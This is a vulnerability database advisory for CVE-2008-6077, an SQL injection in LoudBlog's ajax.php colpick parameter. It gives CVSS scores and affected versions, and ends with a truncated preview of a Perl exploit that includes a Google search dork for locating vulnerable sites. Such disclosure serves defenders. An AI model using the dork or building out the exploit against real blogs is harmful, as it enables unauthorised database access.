6.5
CVSSv2

CVE-2008-6077

Published: 06/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in loudblog/ajax.php in LoudBlog 0.8.0a and previous versions allows remote authenticated users to execute arbitrary SQL commands via the colpick parameter in a singleread action.

Vulnerable Product Search on Vulmon Subscribe to Product

loudblog loudblog 0.7

loudblog loudblog

loudblog loudblog 0.8.0

loudblog loudblog 0.5

loudblog loudblog 0.6

Exploits

#!/usr/bin/perl # This Exploit requires a valid user name and password of an account regardless of the permissions # # Author: Xianur0 # Affected: All Versions # Bug: SQL Injection # # Doorks: # allintext: "powered by LoudBlog" use HTTP::Request::Common qw(POST); use LWP::UserAgent; use Digest::MD5 qw(md5_hex); $ua = LWP::UserAgent-> ...